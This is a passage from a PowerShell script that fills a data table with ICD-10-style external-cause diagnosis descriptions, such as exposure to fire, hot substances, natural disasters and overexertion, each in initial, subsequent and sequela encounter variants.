pressure during ascent","Exposure to other rapid changes in air pressure during ascent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other rapid changes in air pressure during ascent","Exposure to other rapid changes in air pressure during ascent, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to sudden change in air pressure in aircraft during descent","Exposure to sudden change in air pressure in aircraft during descent, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sudden change in air pressure in aircraft during descent","Exposure to sudden change in air pressure in aircraft during descent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sudden change in air pressure in aircraft during descent","Exposure to sudden change in air pressure in aircraft during descent, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to high air pressure from rapid descent in water","Exposure to high air pressure from rapid descent in water, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to high air pressure from rapid descent in water","Exposure to high air pressure from rapid descent in water, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to high air pressure from rapid descent in water","Exposure to high air pressure from rapid descent in water, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other rapid changes in air pressure during descent","Exposure to other rapid changes in air pressure during descent, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other rapid changes in air pressure during descent","Exposure to other rapid changes in air pressure during descent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other rapid changes in air pressure during descent","Exposure to other rapid changes in air pressure during descent, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other man-made environmental factors","Exposure to other man-made environmental factors, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other man-made environmental factors","Exposure to other man-made environmental factors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other man-made environmental factors","Exposure to other man-made environmental factors, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to flames in uncontrolled fire in building or structure","Exposure to flames in uncontrolled fire in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to flames in uncontrolled fire in building or structure","Exposure to flames in uncontrolled fire in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to flames in uncontrolled fire in building or structure","Exposure to flames in uncontrolled fire in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in uncontrolled fire in building or structure","Exposure to smoke in uncontrolled fire in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in uncontrolled fire in building or structure","Exposure to smoke in uncontrolled fire in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in uncontrolled fire in building or structure","Exposure to smoke in uncontrolled fire in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Injury due to collapse of burning building or structure in uncontrolled fire","Injury due to collapse of burning building or structure in uncontrolled fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury due to collapse of burning building or structure in uncontrolled fire","Injury due to collapse of burning building or structure in uncontrolled fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury due to collapse of burning building or structure in uncontrolled fire","Injury due to collapse of burning building or structure in uncontrolled fire, sequela") + $null = $DiagnosisList.Rows.Add("Fall from burning building or structure in uncontrolled fire","Fall from burning building or structure in uncontrolled fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from burning building or structure in uncontrolled fire","Fall from burning building or structure in uncontrolled fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from burning building or structure in uncontrolled fire","Fall from burning building or structure in uncontrolled fire, sequela") + $null = $DiagnosisList.Rows.Add("Hit by object from burning building or structure in uncontrolled fire","Hit by object from burning building or structure in uncontrolled fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit by object from burning building or structure in uncontrolled fire","Hit by object from burning building or structure in uncontrolled fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit by object from burning building or structure in uncontrolled fire","Hit by object from burning building or structure in uncontrolled fire, sequela") + $null = $DiagnosisList.Rows.Add("Jump from burning building or structure in uncontrolled fire","Jump from burning building or structure in uncontrolled fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Jump from burning building or structure in uncontrolled fire","Jump from burning building or structure in uncontrolled fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jump from burning building or structure in uncontrolled fire","Jump from burning building or structure in uncontrolled fire, sequela") + $null = $DiagnosisList.Rows.Add("Other exposure to uncontrolled fire in building or structure","Other exposure to uncontrolled fire in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to uncontrolled fire in building or structure","Other exposure to uncontrolled fire in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to uncontrolled fire in building or structure","Other exposure to uncontrolled fire in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to flames in uncontrolled fire, not in building or structure","Exposure to flames in uncontrolled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to flames in uncontrolled fire, not in building or structure","Exposure to flames in uncontrolled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to flames in uncontrolled fire, not in building or structure","Exposure to flames in uncontrolled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in uncontrolled fire, not in building or structure","Exposure to smoke in uncontrolled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in uncontrolled fire, not in building or structure","Exposure to smoke in uncontrolled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in uncontrolled fire, not in building or structure","Exposure to smoke in uncontrolled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to uncontrolled fire, not in building or structure","Fall due to uncontrolled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to uncontrolled fire, not in building or structure","Fall due to uncontrolled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to uncontrolled fire, not in building or structure","Fall due to uncontrolled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Hit by object due to uncontrolled fire, not in building or structure","Hit by object due to uncontrolled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit by object due to uncontrolled fire, not in building or structure","Hit by object due to uncontrolled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit by object due to uncontrolled fire, not in building or structure","Hit by object due to uncontrolled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Other exposure to uncontrolled fire, not in building or structure","Other exposure to uncontrolled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to uncontrolled fire, not in building or structure","Other exposure to uncontrolled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to uncontrolled fire, not in building or structure","Other exposure to uncontrolled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to flames in controlled fire in building or structure","Exposure to flames in controlled fire in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to flames in controlled fire in building or structure","Exposure to flames in controlled fire in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to flames in controlled fire in building or structure","Exposure to flames in controlled fire in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in controlled fire in building or structure","Exposure to smoke in controlled fire in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in controlled fire in building or structure","Exposure to smoke in controlled fire in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in controlled fire in building or structure","Exposure to smoke in controlled fire in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Injury due to collapse of burning building or structure in controlled fire","Injury due to collapse of burning building or structure in controlled fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury due to collapse of burning building or structure in controlled fire","Injury due to collapse of burning building or structure in controlled fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury due to collapse of burning building or structure in controlled fire","Injury due to collapse of burning building or structure in controlled fire, sequela") + $null = $DiagnosisList.Rows.Add("Fall from burning building or structure in controlled fire","Fall from burning building or structure in controlled fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from burning building or structure in controlled fire","Fall from burning building or structure in controlled fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from burning building or structure in controlled fire","Fall from burning building or structure in controlled fire, sequela") + $null = $DiagnosisList.Rows.Add("Hit by object from burning building or structure in controlled fire","Hit by object from burning building or structure in controlled fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit by object from burning building or structure in controlled fire","Hit by object from burning building or structure in controlled fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit by object from burning building or structure in controlled fire","Hit by object from burning building or structure in controlled fire, sequela") + $null = $DiagnosisList.Rows.Add("Jump from burning building or structure in controlled fire","Jump from burning building or structure in controlled fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Jump from burning building or structure in controlled fire","Jump from burning building or structure in controlled fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Jump from burning building or structure in controlled fire","Jump from burning building or structure in controlled fire, sequela") + $null = $DiagnosisList.Rows.Add("Other exposure to controlled fire in building or structure","Other exposure to controlled fire in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to controlled fire in building or structure","Other exposure to controlled fire in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to controlled fire in building or structure","Other exposure to controlled fire in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to flames in controlled fire, not in building or structure","Exposure to flames in controlled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to flames in controlled fire, not in building or structure","Exposure to flames in controlled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to flames in controlled fire, not in building or structure","Exposure to flames in controlled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in controlled fire, not in building or structure","Exposure to smoke in controlled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in controlled fire, not in building or structure","Exposure to smoke in controlled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke in controlled fire, not in building or structure","Exposure to smoke in controlled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to controlled fire, not in building or structure","Fall due to controlled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to controlled fire, not in building or structure","Fall due to controlled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to controlled fire, not in building or structure","Fall due to controlled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Hit by object due to controlled fire, not in building or structure","Hit by object due to controlled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit by object due to controlled fire, not in building or structure","Hit by object due to controlled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit by object due to controlled fire, not in building or structure","Hit by object due to controlled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Other exposure to controlled fire, not in building or structure","Other exposure to controlled fire, not in building or structure, initial encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to controlled fire, not in building or structure","Other exposure to controlled fire, not in building or structure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to controlled fire, not in building or structure","Other exposure to controlled fire, not in building or structure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to ignition of highly flammable material","Exposure to ignition of highly flammable material, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to ignition of highly flammable material","Exposure to ignition of highly flammable material, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to ignition of highly flammable material","Exposure to ignition of highly flammable material, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to ignition or melting of nightwear","Exposure to ignition or melting of nightwear, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to ignition or melting of nightwear","Exposure to ignition or melting of nightwear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to ignition or melting of nightwear","Exposure to ignition or melting of nightwear, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to ignition of plastic jewelry","Exposure to ignition of plastic jewelry, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to ignition of plastic jewelry","Exposure to ignition of plastic jewelry, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to ignition of plastic jewelry","Exposure to ignition of plastic jewelry, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to melting of plastic jewelry","Exposure to melting of plastic jewelry, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to melting of plastic jewelry","Exposure to melting of plastic jewelry, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to melting of plastic jewelry","Exposure to melting of plastic jewelry, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to ignition of other clothing and apparel","Exposure to ignition of other clothing and apparel, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to ignition of other clothing and apparel","Exposure to ignition of other clothing and apparel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to ignition of other clothing and apparel","Exposure to ignition of other clothing and apparel, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to melting of other clothing and apparel","Exposure to melting of other clothing and apparel, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to melting of other clothing and apparel","Exposure to melting of other clothing and apparel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to melting of other clothing and apparel","Exposure to melting of other clothing and apparel, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to bed fire due to unspecified burning material","Exposure to bed fire due to unspecified burning material, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to bed fire due to unspecified burning material","Exposure to bed fire due to unspecified burning material, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to bed fire due to unspecified burning material","Exposure to bed fire due to unspecified burning material, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to bed fire due to burning cigarette","Exposure to bed fire due to burning cigarette, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to bed fire due to burning cigarette","Exposure to bed fire due to burning cigarette, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to bed fire due to burning cigarette","Exposure to bed fire due to burning cigarette, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to bed fire due to other burning material","Exposure to bed fire due to other burning material, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to bed fire due to other burning material","Exposure to bed fire due to other burning material, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to bed fire due to other burning material","Exposure to bed fire due to other burning material, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to sofa fire due to unspecified burning material","Exposure to sofa fire due to unspecified burning material, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sofa fire due to unspecified burning material","Exposure to sofa fire due to unspecified burning material, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sofa fire due to unspecified burning material","Exposure to sofa fire due to unspecified burning material, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to sofa fire due to burning cigarette","Exposure to sofa fire due to burning cigarette, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sofa fire due to burning cigarette","Exposure to sofa fire due to burning cigarette, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sofa fire due to burning cigarette","Exposure to sofa fire due to burning cigarette, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to sofa fire due to other burning material","Exposure to sofa fire due to other burning material, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sofa fire due to other burning material","Exposure to sofa fire due to other burning material, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sofa fire due to other burning material","Exposure to sofa fire due to other burning material, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other furniture fire due to unspecified burning material","Exposure to other furniture fire due to unspecified burning material, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other furniture fire due to unspecified burning material","Exposure to other furniture fire due to unspecified burning material, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other furniture fire due to unspecified burning material","Exposure to other furniture fire due to unspecified burning material, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other furniture fire due to burning cigarette","Exposure to other furniture fire due to burning cigarette, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other furniture fire due to burning cigarette","Exposure to other furniture fire due to burning cigarette, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other furniture fire due to burning cigarette","Exposure to other furniture fire due to burning cigarette, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other furniture fire due to other burning material","Exposure to other furniture fire due to other burning material, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other furniture fire due to other burning material","Exposure to other furniture fire due to other burning material, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other furniture fire due to other burning material","Exposure to other furniture fire due to other burning material, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other specified smoke, fire and flames","Exposure to other specified smoke, fire and flames, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other specified smoke, fire and flames","Exposure to other specified smoke, fire and flames, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other specified smoke, fire and flames","Exposure to other specified smoke, fire and flames, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot drinks","Contact with hot drinks, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot drinks","Contact with hot drinks, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot drinks","Contact with hot drinks, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot food","Contact with hot food, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot food","Contact with hot food, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot food","Contact with hot food, sequela") + $null = $DiagnosisList.Rows.Add("Contact with fats and cooking oils","Contact with fats and cooking oils, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with fats and cooking oils","Contact with fats and cooking oils, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with fats and cooking oils","Contact with fats and cooking oils, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot water in bath or tub","Contact with hot water in bath or tub, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot water in bath or tub","Contact with hot water in bath or tub, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot water in bath or tub","Contact with hot water in bath or tub, sequela") + $null = $DiagnosisList.Rows.Add("Contact with running hot water","Contact with running hot water, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with running hot water","Contact with running hot water, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with running hot water","Contact with running hot water, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other hot tap-water","Contact with other hot tap-water, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot tap-water","Contact with other hot tap-water, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot tap-water","Contact with other hot tap-water, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other hot fluids","Contact with other hot fluids, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot fluids","Contact with other hot fluids, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot fluids","Contact with other hot fluids, sequela") + $null = $DiagnosisList.Rows.Add("Inhalation of steam and other hot vapors","Inhalation of steam and other hot vapors, initial encounter") + $null = $DiagnosisList.Rows.Add("Inhalation of steam and other hot vapors","Inhalation of steam and other hot vapors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inhalation of steam and other hot vapors","Inhalation of steam and other hot vapors, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with steam and other hot vapors","Other contact with steam and other hot vapors, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with steam and other hot vapors","Other contact with steam and other hot vapors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with steam and other hot vapors","Other contact with steam and other hot vapors, sequela") + $null = $DiagnosisList.Rows.Add("Inhalation of hot air and gases","Inhalation of hot air and gases, initial encounter") + $null = $DiagnosisList.Rows.Add("Inhalation of hot air and gases","Inhalation of hot air and gases, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inhalation of hot air and gases","Inhalation of hot air and gases, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with hot air and other hot gases","Other contact with hot air and other hot gases, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with hot air and other hot gases","Other contact with hot air and other hot gases, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with hot air and other hot gases","Other contact with hot air and other hot gases, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot stove (kitchen)","Contact with hot stove (kitchen), initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot stove (kitchen)","Contact with hot stove (kitchen), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot stove (kitchen)","Contact with hot stove (kitchen), sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot toaster","Contact with hot toaster, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot toaster","Contact with hot toaster, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot toaster","Contact with hot toaster, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hotplate","Contact with hotplate, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hotplate","Contact with hotplate, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hotplate","Contact with hotplate, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot saucepan or skillet","Contact with hot saucepan or skillet, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot saucepan or skillet","Contact with hot saucepan or skillet, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot saucepan or skillet","Contact with hot saucepan or skillet, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other hot household appliances","Contact with other hot household appliances, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot household appliances","Contact with other hot household appliances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot household appliances","Contact with other hot household appliances, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot heating appliances, radiators and pipes","Contact with hot heating appliances, radiators and pipes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot heating appliances, radiators and pipes","Contact with hot heating appliances, radiators and pipes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot heating appliances, radiators and pipes","Contact with hot heating appliances, radiators and pipes, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot engines, machinery and tools","Contact with hot engines, machinery and tools, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot engines, machinery and tools","Contact with hot engines, machinery and tools, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot engines, machinery and tools","Contact with hot engines, machinery and tools, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other hot metals","Contact with other hot metals, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot metals","Contact with other hot metals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot metals","Contact with other hot metals, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other heat and hot substances","Contact with other heat and hot substances, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other heat and hot substances","Contact with other heat and hot substances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other heat and hot substances","Contact with other heat and hot substances, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to excessive natural heat","Exposure to excessive natural heat, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to excessive natural heat","Exposure to excessive natural heat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to excessive natural heat","Exposure to excessive natural heat, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to excessive natural cold","Exposure to excessive natural cold, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to excessive natural cold","Exposure to excessive natural cold, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to excessive natural cold","Exposure to excessive natural cold, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to sunlight","Exposure to sunlight, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sunlight","Exposure to sunlight, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sunlight","Exposure to sunlight, sequela") + $null = $DiagnosisList.Rows.Add("Earthquake","Earthquake, initial encounter") + $null = $DiagnosisList.Rows.Add("Earthquake","Earthquake, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Earthquake","Earthquake, sequela") + $null = $DiagnosisList.Rows.Add("Volcanic eruption","Volcanic eruption, initial encounter") + $null = $DiagnosisList.Rows.Add("Volcanic eruption","Volcanic eruption, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Volcanic eruption","Volcanic eruption, sequela") + $null = $DiagnosisList.Rows.Add("Collapse of dam or man-made structure causing earth movement","Collapse of dam or man-made structure causing earth movement, initial encounter") + $null = $DiagnosisList.Rows.Add("Collapse of dam or man-made structure causing earth movement","Collapse of dam or man-made structure causing earth movement, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Collapse of dam or man-made structure causing earth movement","Collapse of dam or man-made structure causing earth movement, sequela") + $null = $DiagnosisList.Rows.Add("Avalanche, landslide, or mudslide","Avalanche, landslide, or mudslide, initial encounter") + $null = $DiagnosisList.Rows.Add("Avalanche, landslide, or mudslide","Avalanche, landslide, or mudslide, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Avalanche, landslide, or mudslide","Avalanche, landslide, or mudslide, sequela") + $null = $DiagnosisList.Rows.Add("Hurricane","Hurricane, initial encounter") + $null = $DiagnosisList.Rows.Add("Hurricane","Hurricane, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hurricane","Hurricane, sequela") + $null = $DiagnosisList.Rows.Add("Tornado","Tornado, initial encounter") + $null = $DiagnosisList.Rows.Add("Tornado","Tornado, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Tornado","Tornado, sequela") + $null = $DiagnosisList.Rows.Add("Blizzard (snow)(ice)","Blizzard (snow)(ice), initial encounter") + $null = $DiagnosisList.Rows.Add("Blizzard (snow)(ice)","Blizzard (snow)(ice), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blizzard (snow)(ice)","Blizzard (snow)(ice), sequela") + $null = $DiagnosisList.Rows.Add("Dust storm","Dust storm, initial encounter") + $null = $DiagnosisList.Rows.Add("Dust storm","Dust storm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dust storm","Dust storm, sequela") + $null = $DiagnosisList.Rows.Add("Tidal wave due to earthquake or volcanic eruption","Tidal wave due to earthquake or volcanic eruption, initial encounter") + $null = $DiagnosisList.Rows.Add("Tidal wave due to earthquake or volcanic eruption","Tidal wave due to earthquake or volcanic eruption, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Tidal wave due to earthquake or volcanic eruption","Tidal wave due to earthquake or volcanic eruption, sequela") + $null = $DiagnosisList.Rows.Add("Tidal wave due to storm","Tidal wave due to storm, initial encounter") + $null = $DiagnosisList.Rows.Add("Tidal wave due to storm","Tidal wave due to storm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Tidal wave due to storm","Tidal wave due to storm, sequela") + $null = $DiagnosisList.Rows.Add("Tidal wave due to landslide","Tidal wave due to landslide, initial encounter") + $null = $DiagnosisList.Rows.Add("Tidal wave due to landslide","Tidal wave due to landslide, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Tidal wave due to landslide","Tidal wave due to landslide, sequela") + $null = $DiagnosisList.Rows.Add("Other cataclysmic storms","Other cataclysmic storms, initial encounter") + $null = $DiagnosisList.Rows.Add("Other cataclysmic storms","Other cataclysmic storms, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other cataclysmic storms","Other cataclysmic storms, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified cataclysmic storm","Unspecified cataclysmic storm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified cataclysmic storm","Unspecified cataclysmic storm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified cataclysmic storm","Unspecified cataclysmic storm, sequela") + $null = $DiagnosisList.Rows.Add("Flood","Flood, initial encounter") + $null = $DiagnosisList.Rows.Add("Flood","Flood, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Flood","Flood, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to radon","Exposure to radon, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to radon","Exposure to radon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to radon","Exposure to radon, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other natural radiation","Exposure to other natural radiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other natural radiation","Exposure to other natural radiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other natural radiation","Exposure to other natural radiation, sequela") + $null = $DiagnosisList.Rows.Add("Other exposure to forces of nature","Other exposure to forces of nature, initial encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to forces of nature","Other exposure to forces of nature, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other exposure to forces of nature","Other exposure to forces of nature, sequela") + $null = $DiagnosisList.Rows.Add("Overexertion from strenuous movement or load","Overexertion from strenuous movement or load, initial encounter") + $null = $DiagnosisList.Rows.Add("Overexertion from strenuous movement or load","Overexertion from strenuous movement or load, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Overexertion from strenuous movement or load","Overexertion from strenuous movement or load, sequela") + $null = $DiagnosisList.Rows.Add("Overexertion from prolonged static or awkward postures","Overexertion from prolonged static or awkward postures, initial encounter") + $null = $DiagnosisList.Rows.Add("Overexertion from prolonged static or awkward postures","Overexertion from prolonged static or awkward postures, subsequent encounter") + $null = 